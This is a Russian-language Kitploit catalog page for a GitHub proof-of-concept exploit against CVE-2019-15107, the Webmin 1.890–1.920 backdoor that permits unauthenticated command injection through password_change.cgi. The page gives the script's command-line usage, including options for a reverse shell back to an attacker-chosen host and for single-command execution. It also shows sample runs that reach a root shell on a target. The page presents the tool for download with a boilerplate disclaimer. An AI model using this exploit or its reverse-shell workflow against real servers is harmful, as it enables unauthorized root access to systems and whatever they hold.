Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
cve-2019-15107 — PoC-эксплойт для CVE-2019-15107 (Webmin <= 1.920), обеспечивающий неаутентифицированное RCE через внедрение команд. | Kitploit
Инструменты/GitHubGitHub/adampawelczyk/cve-2019-15107
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и Управление
GitHubadampawelczyk/cve-2019-15107

cve-2019-15107

PoC-эксплойт для CVE-2019-15107 (Webmin <= 1.920), обеспечивающий неаутентифицированное RCE через внедрение команд.

Репозиторий
15 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2019-15107 - неаутентифицированный RCE в Webmin

Описание

Этот репозиторий содержит PoC-эксплойт для CVE-2019-15107, затрагивающий Webmin версий с 1.890 по 1.920.

Скрипт эксплуатирует бэкдор в версиях с 1.890 по 1.920, который позволяет неаутентифицированным пользователям внедрять команды в конечную точку password_change.cgi через параметр old (в v.1.890 — expired). Бэкдор был внедрён только в загрузки с SourceForge, однако именно они указаны как официальные загрузки на сайте проекта.

Неизвестный злоумышленник (или злоумышленники) дважды встраивал операторы Perl qx в исходный код сборочного сервера: один раз в апреле 2018 года, когда бэкдор появился в релизе 1.890, и в июле 2018 года, когда бэкдор был повторно внедрён в релизы с 1.900 по 1.920.

В конфигурации по умолчанию эксплуатируемой является только версия 1.890. Для более поздних затронутых версий необходимо включить функцию смены просроченного пароля.

Протестированное окружение

Эксплойт был успешно протестирован в следующем окружении:

  • Версия Webmin: 1.890
  • Операционная система: Ubuntu 18.04.4 LTS
  • Использование

    root@kitploit:~
    python3 cve-2019-15107.py -r <TARGET_IP> -l <LOCAL_IP> [options]
    
    options:
      -h, --help                 Show this help message and exit
      -r, --rhost RHOST          Target IP address
      -rp, --rport RPORT         Target port (default: 10000)
      -l, --lhost LHOST          Local IP for reverse shell
      -lp, --lport LPORT         Local port for reverse shell (default: 4343)
      -s, --scheme {http,https}  Protocol to use (default: https)
      -x, --proxy [PROXY]        Use proxy (default: http://127.0.0.1:8080)
      -f, --force                Force exploitation even if detection fails
      -c, --cmd CMD              Execute a single command instead of reverse shell
    

    Пример

    root@kitploit:~
    ┌──(adam㉿kali)-[~]
    └─$ python3 cve-2019-15107.py -r 10.114.159.93 -l 192.168.158.129
    
       _____   _____   ___ __  _ ___     _ ___ _  __ ____ 
      / __\ \ / / __|_|_  )  \/ / _ \___/ | __/ |/  \__  |
     | (__ \ V /| _|___/ / () | \_, /___| |__ \ | () |/ / 
      \___| \_/ |___| /___\__/|_|/_/    |_|___/_|\__//_/  
    
      CVE-2019-15107 | Webmin Unauthenticated RCE
      by adampawelczyk
    
    [*] Checking vulnerability...
    [*] Detecting target version...
    [+] Detected Webmin 1.890
    [+] Target is vulnerable
    [*] Starting listener on port 4343...
    listening on [any] 4343 ...
    [*] Sending payload...
    connect to [192.168.158.129] from (UNKNOWN) [10.114.159.93] 59970
    bash: cannot set terminal process group (1314): Inappropriate ioctl for device
    bash: no job control in this shell
    root@source:/usr/share/webmin/# whoami
    whoami
    root
    root@source:/usr/share/webmin/# 
    
    root@kitploit:~
    ┌──(adam㉿kali)-[~]
    └─$ python3 cve-2019-15107.py -r 10.114.159.93 -l 192.168.158.129 -c whoami                                                                                                                                                                 
    
       _____   _____   ___ __  _ ___     _ ___ _  __ ____ 
      / __\ \ / / __|_|_  )  \/ / _ \___/ | __/ |/  \__  |
     | (__ \ V /| _|___/ / () | \_, /___| |__ \ | () |/ / 
      \___| \_/ |___| /___\__/|_|/_/    |_|___/_|\__//_/  
    
      CVE-2019-15107 | Webmin Unauthenticated RCE
      by adampawelczyk
    
    [*] Checking vulnerability...
    [*] Detecting target version...
    [+] Detected Webmin 1.890
    [+] Target is vulnerable
    [+] Command output:
    ========================================
    root
    

    Ссылки

    • https://nvd.nist.gov/vuln/detail/CVE-2019-15107
    • https://webmin.com/security/
    • https://www.exploit-db.com/exploits/47230

    Отказ от ответственности

    Этот инструмент предназначен только для образовательных целей и авторизованного тестирования. Несанкционированное использование против систем, которыми вы не владеете или на тестирование которых у вас нет разрешения, является незаконным. Используйте ответственно.

    Скачать инструмент